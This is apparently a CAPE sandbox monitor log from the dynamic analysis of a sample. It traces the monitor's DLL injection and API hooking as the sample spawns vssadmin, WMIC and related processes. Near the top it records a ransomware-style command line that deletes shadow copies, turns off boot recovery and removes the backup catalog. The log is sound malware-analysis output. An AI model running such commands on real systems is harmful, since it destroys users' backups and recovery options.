2025-12-08 09:09:47,343 [root] DEBUG: 2460: YaraScan: Scanning 0x4A620000, size 0x4bb2e
2025-12-08 09:09:47,343 [root] DEBUG: 2460: Monitor initialised: 32-bit capemon loaded in process 2460 at 0x74260000, thread 960, image base 0x4a620000, stack from 0x53000-0x150000
2025-12-08 09:09:47,343 [root] DEBUG: 2460: Commandline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2025-12-08 09:09:47,343 [root] DEBUG: 2460: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:47,343 [root] DEBUG: 2460: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:47,359 [root] DEBUG: 2460: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:47,359 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:47,359 [root] DEBUG: 2460: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:47,359 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:47,359 [root] DEBUG: 2460: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:47,359 [root] DEBUG: 2460: Hooked 611 out of 613 functions
2025-12-08 09:09:47,359 [root] DEBUG: 2460: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:47,359 [root] DEBUG: 2460: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x290000
2025-12-08 09:09:47,359 [root] INFO: Loaded monitor into process with pid 2460
2025-12-08 09:09:47,359 [root] DEBUG: 2460: caller_dispatch: Added region at 0x4A620000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x4A627CBD, thread 960).
2025-12-08 09:09:47,375 [root] DEBUG: 2460: YaraScan: Scanning 0x4A620000, size 0x4bb2e
2025-12-08 09:09:47,375 [root] DEBUG: 2460: ProcessImageBase: Main module image at 0x4A620000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:47,375 [root] DEBUG: 2460: CreateProcessHandler: Injection info set for new process 1036: C:\Windows\system32\vssadmin.exe, ImageBase: 0x00520000
2025-12-08 09:09:47,375 [root] INFO: Announced 32-bit process name: vssadmin.exe pid: 1036
2025-12-08 09:09:47,375 [lib.api.process] INFO: Monitor config for <Process 1036 vssadmin.exe>: C:\tmp2azv04x4\dll\1036.ini
2025-12-08 09:09:47,375 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:47,390 [root] DEBUG: Loader: Injecting process 1036 (thread 716) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,390 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:47,390 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,390 [lib.api.process] INFO: Injected into 32-bit <Process 1036 vssadmin.exe>
2025-12-08 09:09:47,390 [root] DEBUG: 2460: DLL loaded at 0x73910000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 09:09:47,406 [root] INFO: Announced 32-bit process name: vssadmin.exe pid: 1036
2025-12-08 09:09:47,406 [lib.api.process] INFO: Monitor config for <Process 1036 vssadmin.exe>: C:\tmp2azv04x4\dll\1036.ini
2025-12-08 09:09:47,406 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:47,421 [root] DEBUG: Loader: Injecting process 1036 (thread 716) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,421 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:47,421 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:47,421 [lib.api.process] INFO: Injected into 32-bit <Process 1036 vssadmin.exe>
2025-12-08 09:09:47,453 [root] DEBUG: 1036: Python path set to 'C:\Python38'.
2025-12-08 09:09:47,453 [root] DEBUG: 1036: Dropped file limit defaulting to 100.
2025-12-08 09:09:47,453 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:47,453 [root] DEBUG: 1036: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:47,453 [root] DEBUG: 1036: YaraScan: Scanning 0x00520000, size 0x1e14c
2025-12-08 09:09:47,453 [root] DEBUG: 1036: Monitor initialised: 32-bit capemon loaded in process 1036 at 0x74260000, thread 716, image base 0x520000, stack from 0x216000-0x220000
2025-12-08 09:09:47,453 [root] DEBUG: 1036: Commandline: vssadmin  delete shadows /all /quiet
2025-12-08 09:09:47,468 [root] DEBUG: 1036: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:47,468 [root] DEBUG: 1036: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:47,468 [root] DEBUG: 1036: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:47,468 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:47,468 [root] DEBUG: 1036: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:47,468 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:47,468 [root] DEBUG: 1036: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:47,468 [root] DEBUG: 1036: Hooked 611 out of 613 functions
2025-12-08 09:09:47,468 [root] DEBUG: 1036: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:47,468 [root] DEBUG: 1036: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x140000
2025-12-08 09:09:47,484 [root] INFO: Loaded monitor into process with pid 1036
2025-12-08 09:09:47,484 [root] DEBUG: 1036: caller_dispatch: Added region at 0x00520000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x005325EE, thread 716).
2025-12-08 09:09:47,484 [root] DEBUG: 1036: YaraScan: Scanning 0x00520000, size 0x1e14c
2025-12-08 09:09:47,484 [root] DEBUG: 1036: ProcessImageBase: Main module image at 0x00520000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:47,484 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 1036, handle 0x614: C:\Windows\SysWOW64\vssadmin.exe
2025-12-08 09:09:47,484 [root] DEBUG: 1036: DLL loaded at 0x756F0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2025-12-08 09:09:47,484 [root] DEBUG: 1036: DLL loaded at 0x73140000: C:\Windows\SysWOW64\CRYPTSP (0x17000 bytes).
2025-12-08 09:09:47,484 [root] DEBUG: 1036: DLL loaded at 0x73100000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 09:09:47,500 [root] DEBUG: 1036: DLL loaded at 0x73410000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2025-12-08 09:09:47,562 [root] INFO: Announced starting service "b'VSS'"
2025-12-08 09:09:47,562 [lib.api.process] INFO: Monitor config for <Process 432 services.exe>: C:\tmp2azv04x4\dll\432.ini
2025-12-08 09:09:47,562 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:47,562 [root] DEBUG: Loader: Injecting process 432 with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:47,578 [root] DEBUG: 432: Python path set to 'C:\Python38'.
2025-12-08 09:09:47,578 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:47,578 [root] DEBUG: 432: Dropped file limit defaulting to 100.
2025-12-08 09:09:47,578 [root] DEBUG: 432: parent_has_path: unable to get path for parent process 340
2025-12-08 09:09:47,578 [root] DEBUG: 432: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:47,578 [root] DEBUG: 432: YaraScan: Scanning 0x00000000FF400000, size 0x5221e
2025-12-08 09:09:47,578 [root] DEBUG: 432: Monitor initialised: 64-bit capemon loaded in process 432 at 0x000007FEF30B0000, thread 836, image base 0x00000000FF400000, stack from 0x0000000001116000-0x0000000001120000
2025-12-08 09:09:47,578 [root] DEBUG: 432: Commandline: C:\Windows\system32\services.exe
2025-12-08 09:09:47,578 [root] DEBUG: 432: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:47,593 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:09:47,593 [root] DEBUG: 432: set_hooks: Unable to hook LockResource
2025-12-08 09:09:47,593 [root] DEBUG: 432: Hooked 605 out of 606 functions
2025-12-08 09:09:47,609 [root] INFO: Loaded monitor into process with pid 432
2025-12-08 09:09:47,609 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 09:09:47,609 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:47,609 [lib.api.process] INFO: Injected into 64-bit <Process 432 services.exe>
2025-12-08 09:09:48,875 [root] DEBUG: 432: caller_dispatch: Added region at 0x00000000FF400000 to tracked regions list (ntdll::NtSetInformationThread returns to 0x00000000FF40149D, thread 3060).
2025-12-08 09:09:48,875 [root] DEBUG: 432: YaraScan: Scanning 0x00000000FF400000, size 0x5221e
2025-12-08 09:09:48,875 [root] DEBUG: 432: ProcessImageBase: Main module image at 0x00000000FF400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:48,890 [root] DEBUG: 432: OpenProcessHandler: Injection info created for process 1316, handle 0x140: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
2025-12-08 09:09:48,890 [root] INFO: Announced 64-bit process name: OfficeC2RClient.exe pid: 1316
2025-12-08 09:09:48,890 [lib.api.process] INFO: Monitor config for <Process 1316 OfficeC2RClient.exe>: C:\tmp2azv04x4\dll\1316.ini
2025-12-08 09:09:48,906 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:48,921 [root] DEBUG: Loader: Injecting process 1316 with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:48,921 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2492, handle 0x618: C:\Windows\System32\schtasks.exe
2025-12-08 09:09:48,937 [root] DEBUG: 1316: Python path set to 'C:\Python38'.
2025-12-08 09:09:48,937 [root] DEBUG: 1316: Dropped file limit defaulting to 100.
2025-12-08 09:09:48,953 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 1844, handle 0x618: C:\Windows\System32\schtasks.exe
2025-12-08 09:09:48,968 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:48,984 [root] DEBUG: 1316: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:48,984 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 1568, handle 0x618: C:\Windows\System32\schtasks.exe
2025-12-08 09:09:48,984 [root] DEBUG: 1316: YaraScan: Scanning 0x000000013FC80000, size 0x114ae3e
2025-12-08 09:09:49,062 [root] DEBUG: 1316: Monitor initialised: 64-bit capemon loaded in process 1316 at 0x000007FEF30B0000, thread 2904, image base 0x000000013FC80000, stack from 0x0000000001D76000-0x0000000001D80000
2025-12-08 09:09:49,062 [root] DEBUG: 1316: Commandline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe" /update SCHEDULEDTASK displaylevel=False
2025-12-08 09:09:49,078 [root] DEBUG: 1316: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:49,093 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:09:49,093 [root] DEBUG: 1316: set_hooks: Unable to hook LockResource
2025-12-08 09:09:49,109 [root] DEBUG: 1316: Hooked 605 out of 606 functions
2025-12-08 09:09:49,109 [root] INFO: Loaded monitor into process with pid 1316
2025-12-08 09:09:49,109 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 09:09:49,109 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:49,109 [lib.api.process] INFO: Injected into 64-bit <Process 1316 OfficeC2RClient.exe>
2025-12-08 09:09:49,125 [root] DEBUG: 1316: caller_dispatch: Added region at 0x000000013FC80000 to tracked regions list (ntdll::LdrUnloadDll returns to 0x000000013FEE175B, thread 2884).
2025-12-08 09:09:49,125 [root] DEBUG: 1316: YaraScan: Scanning 0x000000013FC80000, size 0x114ae3e
2025-12-08 09:09:49,203 [root] DEBUG: 1316: ProcessImageBase: Main module image at 0x000000013FC80000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:49,218 [root] DEBUG: 1316: caller_dispatch: Added region at 0x000007FEF9220000 to tracked regions list (ntdll::NtWaitForSingleObject returns to 0x000007FEF9229A6B, thread 2884).
2025-12-08 09:09:49,218 [root] DEBUG: 1316: ProcessTrackedRegion: Region at 0x000007FEF9220000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\Microsoft Shared\ClickToRun\msvcp140.dll, skipping
2025-12-08 09:09:49,218 [root] DEBUG: 1316: caller_dispatch: Added region at 0x000007FEF9480000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x000007FEF948A606, thread 2884).
2025-12-08 09:09:49,218 [root] DEBUG: 1316: ProcessTrackedRegion: Region at 0x000007FEF9480000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\Microsoft Shared\ClickToRun\ucrtbase.dll, skipping
2025-12-08 09:09:49,609 [root] DEBUG: 432: CreateProcessHandler: Injection info set for new process 2540: C:\Windows\system32\vssvc.exe, ImageBase: 0x00000000FFD90000
2025-12-08 09:09:49,609 [root] INFO: Announced 64-bit process name: VSSVC.exe pid: 2540
2025-12-08 09:09:49,609 [lib.api.process] INFO: Monitor config for <Process 2540 VSSVC.exe>: C:\tmp2azv04x4\dll\2540.ini
2025-12-08 09:09:49,625 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:49,625 [root] DEBUG: Loader: Injecting process 2540 (thread 2560) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:49,625 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:49,625 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:49,625 [lib.api.process] INFO: Injected into 64-bit <Process 2540 VSSVC.exe>
2025-12-08 09:09:49,625 [root] INFO: Announced 64-bit process name: VSSVC.exe pid: 2540
2025-12-08 09:09:49,625 [lib.api.process] INFO: Monitor config for <Process 2540 VSSVC.exe>: C:\tmp2azv04x4\dll\2540.ini
2025-12-08 09:09:49,625 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:49,640 [root] DEBUG: Loader: Injecting process 2540 (thread 2560) with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:49,640 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:49,640 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:49,640 [lib.api.process] INFO: Injected into 64-bit <Process 2540 VSSVC.exe>
2025-12-08 09:09:49,656 [root] DEBUG: 2540: Python path set to 'C:\Python38'.
2025-12-08 09:09:49,687 [root] DEBUG: 2540: Dropped file limit defaulting to 100.
2025-12-08 09:09:49,687 [root] DEBUG: 2540: VerifyCodeSection: Executable code does not match, 0x4e0 of 0x174a46 matching
2025-12-08 09:09:49,703 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:49,703 [root] DEBUG: 2540: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:49,703 [root] DEBUG: 2540: YaraScan: Scanning 0x00000000FFD90000, size 0x189682
2025-12-08 09:09:49,718 [root] DEBUG: 2540: Monitor initialised: 64-bit capemon loaded in process 2540 at 0x000007FEF30B0000, thread 2560, image base 0x00000000FFD90000, stack from 0x0000000000265000-0x0000000000270000
2025-12-08 09:09:49,718 [root] DEBUG: 2540: Commandline: C:\Windows\system32\vssvc.exe
2025-12-08 09:09:49,734 [root] DEBUG: 2540: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:49,734 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:09:49,750 [root] DEBUG: 2540: set_hooks: Unable to hook LockResource
2025-12-08 09:09:49,750 [root] DEBUG: 2540: hook_api: Warning - NetUserGetInfo export address 0x000007FEFB1AFFBA differs from GetProcAddress -> 0x000007FEFB151354 (SAMCLI.DLL::0x1354)
2025-12-08 09:09:49,750 [root] DEBUG: 2540: hook_api: Warning - NetGetJoinInformation export address 0x000007FEFB1AF7FE differs from GetProcAddress -> 0x000007FEFB1719BC (wkscli.dll::0x19bc)
2025-12-08 09:09:49,750 [root] DEBUG: 2540: hook_api: Warning - NetUserGetLocalGroups export address 0x000007FEFB1AFFD0 differs from GetProcAddress -> 0x000007FEFB1533D0 (SAMCLI.DLL::0x33d0)
2025-12-08 09:09:49,750 [root] DEBUG: 2540: hook_api: Warning - DsEnumerateDomainTrustsW export address 0x000007FEFB1AE9CA differs from GetProcAddress -> 0x000007FEFC847A7C (LOGONCLI.DLL::0x7a7c)
2025-12-08 09:09:49,750 [root] DEBUG: 2540: Hooked 605 out of 606 functions
2025-12-08 09:09:49,750 [root] INFO: Loaded monitor into process with pid 2540
2025-12-08 09:09:49,750 [root] DEBUG: 2540: caller_dispatch: Added region at 0x00000000FFD90000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00000000FFEC13B1, thread 2560).
2025-12-08 09:09:49,750 [root] DEBUG: 2540: YaraScan: Scanning 0x00000000FFD90000, size 0x189682
2025-12-08 09:09:49,765 [root] DEBUG: 2540: ProcessImageBase: Main module image at 0x00000000FFD90000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:49,765 [root] DEBUG: 2540: DLL loaded at 0x000007FEFD110000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2025-12-08 09:09:49,765 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2540, handle 0x614: C:\Windows\System32\VSSVC.exe
2025-12-08 09:09:49,765 [root] DEBUG: 2540: DLL loaded at 0x000007FEFE7F0000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2025-12-08 09:09:49,765 [root] DEBUG: 2540: DLL loaded at 0x000007FEFCA50000: C:\Windows\system32\CRYPTSP (0x18000 bytes).
2025-12-08 09:09:49,781 [root] DEBUG: 2540: DLL loaded at 0x000007FEFC750000: C:\Windows\system32\rsaenh (0x47000 bytes).
2025-12-08 09:09:49,781 [root] DEBUG: 2540: DLL loaded at 0x000007FEFD200000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2025-12-08 09:09:49,781 [root] DEBUG: 2540: DLL loaded at 0x000007FEF3C90000: C:\Windows\system32\vss_ps (0x14000 bytes).
2025-12-08 09:09:49,796 [root] DEBUG: 2540: DLL loaded at 0x000007FEFBBD0000: C:\Windows\system32\SAMLIB (0x1d000 bytes).
2025-12-08 09:09:49,796 [root] DEBUG: 2540: DLL loaded at 0x000007FEFAC90000: C:\Windows\system32\es (0x67000 bytes).
2025-12-08 09:09:49,796 [root] DEBUG: 1036: NtTerminateProcess hook: Attempting to dump process 1036
2025-12-08 09:09:49,796 [root] DEBUG: 1036: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:49,812 [root] INFO: Process with pid 1036 has terminated
2025-12-08 09:09:49,812 [root] DEBUG: 2540: DLL loaded at 0x000007FEFBAA0000: C:\Windows\system32\PROPSYS (0x12c000 bytes).
2025-12-08 09:09:49,812 [root] DEBUG: 2540: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:09:49,812 [root] DEBUG: 2460: CreateProcessHandler: Injection info set for new process 2600: C:\Windows\System32\Wbem\WMIC.exe, ImageBase: 0x00E40000
2025-12-08 09:09:49,812 [root] INFO: Announced 32-bit process name: WMIC.exe pid: 2600
2025-12-08 09:09:49,828 [lib.api.process] INFO: Monitor config for <Process 2600 WMIC.exe>: C:\tmp2azv04x4\dll\2600.ini
2025-12-08 09:09:49,828 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:49,843 [root] DEBUG: 2540: DLL loaded at 0x000007FEF2CD0000: C:\Windows\system32\catsrvut (0x85000 bytes).
2025-12-08 09:09:49,843 [root] DEBUG: Loader: Injecting process 2600 (thread 728) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:49,843 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:49,859 [root] DEBUG: 2540: DLL loaded at 0x000007FEF2CC0000: C:\Windows\system32\MfcSubs (0xc000 bytes).
2025-12-08 09:09:49,859 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:49,859 [lib.api.process] INFO: Injected into 32-bit <Process 2600 WMIC.exe>
2025-12-08 09:09:49,875 [root] INFO: Announced 32-bit process name: WMIC.exe pid: 2600
2025-12-08 09:09:49,875 [lib.api.process] INFO: Monitor config for <Process 2600 WMIC.exe>: C:\tmp2azv04x4\dll\2600.ini
2025-12-08 09:09:49,875 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:49,890 [root] DEBUG: Loader: Injecting process 2600 (thread 728) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:49,890 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:49,906 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:49,906 [lib.api.process] INFO: Injected into 32-bit <Process 2600 WMIC.exe>
2025-12-08 09:09:49,906 [root] DEBUG: 2600: Python path set to 'C:\Python38'.
2025-12-08 09:09:49,906 [root] DEBUG: 2600: Dropped file limit defaulting to 100.
2025-12-08 09:09:49,921 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:49,921 [root] DEBUG: 1316: DLL loaded at 0x000007FEFBFE0000: C:\Windows\system32\POWRPROF (0x2c000 bytes).
2025-12-08 09:09:49,921 [root] DEBUG: 2600: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:49,921 [root] DEBUG: 2600: YaraScan: Scanning 0x00E40000, size 0x621ec
2025-12-08 09:09:49,937 [root] DEBUG: 2600: Monitor initialised: 32-bit capemon loaded in process 2600 at 0x74260000, thread 728, image base 0xe40000, stack from 0xa6000-0xb0000
2025-12-08 09:09:49,937 [root] DEBUG: 2600: Commandline: wmic  shadowcopy delete
2025-12-08 09:09:49,937 [root] DEBUG: 2600: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:49,937 [root] DEBUG: 2600: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:49,953 [root] DEBUG: 2600: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:49,953 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:49,953 [root] DEBUG: 2600: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:49,953 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:49,953 [root] DEBUG: 2600: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:49,968 [root] DEBUG: 2600: Hooked 611 out of 613 functions
2025-12-08 09:09:49,968 [root] DEBUG: 2600: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:49,968 [root] DEBUG: 2600: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x290000
2025-12-08 09:09:49,968 [root] INFO: Loaded monitor into process with pid 2600
2025-12-08 09:09:49,968 [root] DEBUG: 2600: caller_dispatch: Added region at 0x00E40000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00E7E15E, thread 728).
2025-12-08 09:09:49,968 [root] DEBUG: 2600: YaraScan: Scanning 0x00E40000, size 0x621ec
2025-12-08 09:09:49,984 [root] DEBUG: 2600: ProcessImageBase: Main module image at 0x00E40000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:49,984 [root] DEBUG: 1316: NtTerminateProcess hook: Attempting to dump process 1316
2025-12-08 09:09:49,984 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2600, handle 0x4d0: C:\Windows\SysWOW64\wbem\WMIC.exe
2025-12-08 09:09:50,000 [root] DEBUG: 1316: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:50,000 [lib.api.process] INFO: Monitor config for <Process 900 svchost.exe>: C:\tmp2azv04x4\dll\900.ini
2025-12-08 09:09:50,000 [root] DEBUG: 1316: caller_dispatch: Added region at 0x000007FEF90E0000 to tracked regions list (ntdll::LdrGetProcedureAddress returns to 0x000007FEF90F58B4, thread 2884).
2025-12-08 09:09:50,000 [root] DEBUG: 1316: caller_dispatch: Scanning calling region at 0x000007FEF90E0000...
2025-12-08 09:09:50,000 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:50,015 [root] DEBUG: 1316: ProcessTrackedRegion: Region at 0x000007FEF90E0000 mapped as \Device\HarddiskVolume2\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll, skipping
2025-12-08 09:09:50,031 [root] INFO: Process with pid 1316 has terminated
2025-12-08 09:09:50,031 [root] DEBUG: Loader: Injecting process 900 with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:50,031 [root] DEBUG: 900: Python path set to 'C:\Python38'.
2025-12-08 09:09:50,046 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:50,046 [root] DEBUG: 900: Dropped file limit defaulting to 100.
2025-12-08 09:09:50,046 [root] DEBUG: 900: parent_has_path: unable to get path for parent process 432
2025-12-08 09:09:50,046 [root] DEBUG: 900: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:50,046 [root] DEBUG: 900: YaraScan: Scanning 0x00000000FF1E0000, size 0xa052
2025-12-08 09:09:50,046 [root] DEBUG: 900: Monitor initialised: 64-bit capemon loaded in process 900 at 0x000007FEF30B0000, thread 2208, image base 0x00000000FF1E0000, stack from 0x00000000017D6000-0x00000000017E0000
2025-12-08 09:09:50,046 [root] DEBUG: 900: Commandline: C:\Windows\system32\svchost.exe -k netsvcs
2025-12-08 09:09:50,062 [root] DEBUG: 900: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:50,062 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:09:50,062 [root] DEBUG: 900: set_hooks: Unable to hook LockResource
2025-12-08 09:09:50,078 [root] DEBUG: 900: Hooked 605 out of 606 functions
2025-12-08 09:09:50,078 [root] INFO: Loaded monitor into process with pid 900
2025-12-08 09:09:50,078 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 09:09:50,078 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:50,078 [lib.api.process] INFO: Injected into 64-bit <Process 900 svchost.exe>
2025-12-08 09:09:52,078 [root] DEBUG: 2600: DLL loaded at 0x756F0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2025-12-08 09:09:52,078 [root] DEBUG: 2600: DLL loaded at 0x71950000: C:\Windows\system32\wbem\wbemprox (0xb000 bytes).
2025-12-08 09:09:52,078 [root] DEBUG: 2600: DLL loaded at 0x71740000: C:\Windows\system32\wbemcomn2 (0x61000 bytes).
